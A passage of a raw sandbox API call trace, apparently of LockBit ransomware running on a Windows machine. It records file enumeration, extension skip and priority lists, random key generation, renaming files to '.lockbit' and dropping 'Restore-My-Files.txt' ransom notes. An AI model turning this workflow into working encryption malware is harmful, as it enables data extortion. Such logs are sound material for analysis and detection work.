lpOverlapped=0x3df0008) returned 1 [0210.351] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.351] malloc (_Size=0xa0) returned 0x2073f40 [0210.351] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0xa0, FileInformationClass=0xa) returned 0x0 [0210.357] free (_Block=0x2073f40) [0210.357] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.357] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.357] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.359] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.359] malloc (_Size=0x40068) returned 0x3df0008 [0210.359] WriteFile (in: hFile=0xec, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.361] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd30b00, ftCreationTime.dwHighDateTime=0x1cab7ea, ftLastAccessTime.dwLowDateTime=0x15087730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xadd30b00, ftLastWriteTime.dwHighDateTime=0x1cab7ea, nFileSizeHigh=0x0, nFileSizeLow=0x33b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCOLKI.DLL", cAlternateFileName="")) returned 1 [0210.361] lstrcmpiW (lpString1=".", lpString2="ACCOLKI.DLL") returned -1 [0210.361] lstrcmpiW (lpString1="..", lpString2="ACCOLKI.DLL") returned -1 [0210.361] PathFindExtensionW (pszPath="ACCOLKI.DLL") returned=".DLL" [0210.361] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.361] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.361] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.361] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.361] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.361] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.361] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.361] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.361] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.361] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.362] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6146600, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x15087730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa6146600, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x26b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCVDTUI.DLL", cAlternateFileName="")) returned 1 [0210.362] lstrcmpiW (lpString1=".", lpString2="ACCVDTUI.DLL") returned -1 [0210.362] lstrcmpiW (lpString1="..", lpString2="ACCVDTUI.DLL") returned -1 [0210.362] PathFindExtensionW (pszPath="ACCVDTUI.DLL") returned=".DLL" [0210.362] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.362] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.362] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.363] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.363] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.363] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.363] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.363] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.363] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.363] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a36c100, ftCreationTime.dwHighDateTime=0x1c6af9a, ftLastAccessTime.dwLowDateTime=0x150ad890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a36c100, ftLastWriteTime.dwHighDateTime=0x1c6af9a, nFileSizeHigh=0x0, nFileSizeLow=0x53de0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACTIP10.HLP", cAlternateFileName="")) returned 1 [0210.363] lstrcmpiW (lpString1=".", lpString2="ACTIP10.HLP") returned -1 [0210.363] lstrcmpiW (lpString1="..", lpString2="ACTIP10.HLP") returned -1 [0210.363] PathFindExtensionW (pszPath="ACTIP10.HLP") returned=".HLP" [0210.363] lstrcmpiW (lpString1=".386", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".cmd", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".exe", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".ani", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".adv", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".theme", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".msi", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".msp", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".com", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".diagpkg", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".nls", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".diagcab", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".lock", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".ocx", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".mpa", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".cpl", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".mod", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".hta", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".icns", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".prf", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".rtp", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".diagcfg", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".msstyles", lpString2=".HLP") returned 1 [0210.364] lstrcmpiW (lpString1=".bin", lpString2=".HLP") returned -1 [0210.364] lstrcmpiW (lpString1=".hlp", lpString2=".HLP") returned 0 [0210.364] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefafd800, ftCreationTime.dwHighDateTime=0x1ca674a, ftLastAccessTime.dwLowDateTime=0x150ad890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xefafd800, ftLastWriteTime.dwHighDateTime=0x1ca674a, nFileSizeHigh=0x0, nFileSizeLow=0x43590, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACWIZRC.DLL", cAlternateFileName="")) returned 1 [0210.364] lstrcmpiW (lpString1=".", lpString2="ACWIZRC.DLL") returned -1 [0210.364] lstrcmpiW (lpString1="..", lpString2="ACWIZRC.DLL") returned -1 [0210.364] PathFindExtensionW (pszPath="ACWIZRC.DLL") returned=".DLL" [0210.364] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.364] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.364] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.364] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.364] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.365] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.365] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.365] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.365] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.365] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.365] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.365] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.365] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.365] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.365] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4ab4f00, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x5054cac0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb4ab4f00, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x10f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="AEC.VSL", cAlternateFileName="")) returned 1 [0210.366] lstrcmpiW (lpString1=".", lpString2="AEC.VSL") returned -1 [0210.366] lstrcmpiW (lpString1="..", lpString2="AEC.VSL") returned -1 [0210.366] PathFindExtensionW (pszPath="AEC.VSL") returned=".VSL" [0210.366] lstrcmpiW (lpString1=".386", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".cmd", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".exe", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".ani", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".adv", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".theme", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".msi", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".msp", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".com", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".diagpkg", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".nls", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".diagcab", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".lock", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".ocx", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".mpa", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".cpl", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".mod", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".hta", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".icns", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".prf", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".rtp", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".diagcfg", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".msstyles", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".bin", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".hlp", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".shs", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".drv", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".wpx", lpString2=".VSL") returned 1 [0210.366] lstrcmpiW (lpString1=".bat", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".rom", lpString2=".VSL") returned -1 [0210.366] lstrcmpiW (lpString1=".msc", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".spl", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".ps1", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".msu", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".ics", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".key", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".mp3", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".reg", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".dll", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".ini", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".idx", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".sys", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".hlp", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".ico", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".lnk", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".rdp", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".lockbit", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AEC.VSL") returned 1 [0210.367] lstrcmpiW (lpString1="ntldr", lpString2="AEC.VSL") returned 1 [0210.367] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AEC.VSL") returned 1 [0210.367] lstrcmpiW (lpString1="bootsect.bak", lpString2="AEC.VSL") returned 1 [0210.367] lstrcmpiW (lpString1="autorun.inf", lpString2="AEC.VSL") returned 1 [0210.367] lstrcmpiW (lpString1="thumbs.db", lpString2="AEC.VSL") returned 1 [0210.367] lstrcmpiW (lpString1="iconcache.db", lpString2="AEC.VSL") returned 1 [0210.367] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.367] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned=".VSL" [0210.367] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0210.367] lstrcmpiW (lpString1=".7z", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".ckp", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".dacpac", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".db", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".db-shm", lpString2=".VSL") returned -1 [0210.367] lstrcmpiW (lpString1=".db-wal", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".db3", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".dbc", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".dbs", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".dbt", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".dbv", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".frm", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".mdf", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".mrg", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".mwb", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".myd", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".ndf", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".qry", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".sdb", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".sdf", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".sql", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".sqlite", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".sqlite3", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".sqlitedb", lpString2=".VSL") returned -1 [0210.368] lstrcmpiW (lpString1=".tmd", lpString2=".VSL") returned -1 [0210.368] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.lockbit") returned 64 [0210.368] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.371] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.371] malloc (_Size=0x40068) returned 0x3df0008 [0210.371] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=69496) returned 1 [0210.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.372] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.375] malloc (_Size=0x96) returned 0x2073f40 [0210.375] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x96, FileInformationClass=0xa) returned 0x0 [0210.377] free (_Block=0x2073f40) [0210.377] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.377] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.377] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.377] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bf8d00, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x5054cac0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa8bf8d00, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0xa388, dwReserved0=0x0, dwReserved1=0x0, cFileName="AECUTILS.VSL", cAlternateFileName="")) returned 1 [0210.377] lstrcmpiW (lpString1=".", lpString2="AECUTILS.VSL") returned -1 [0210.377] lstrcmpiW (lpString1="..", lpString2="AECUTILS.VSL") returned -1 [0210.377] PathFindExtensionW (pszPath="AECUTILS.VSL") returned=".VSL" [0210.377] lstrcmpiW (lpString1=".386", lpString2=".VSL") returned -1 [0210.377] lstrcmpiW (lpString1=".cmd", lpString2=".VSL") returned -1 [0210.377] lstrcmpiW (lpString1=".exe", lpString2=".VSL") returned -1 [0210.377] lstrcmpiW (lpString1=".ani", lpString2=".VSL") returned -1 [0210.377] lstrcmpiW (lpString1=".adv", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".theme", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".msi", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".msp", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".com", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".diagpkg", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".nls", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".diagcab", lpString2=".VSL") returned -1 [0210.378] lstrcmpiW (lpString1=".lock", lpString2=".VSL") returned -1 [0210.378] 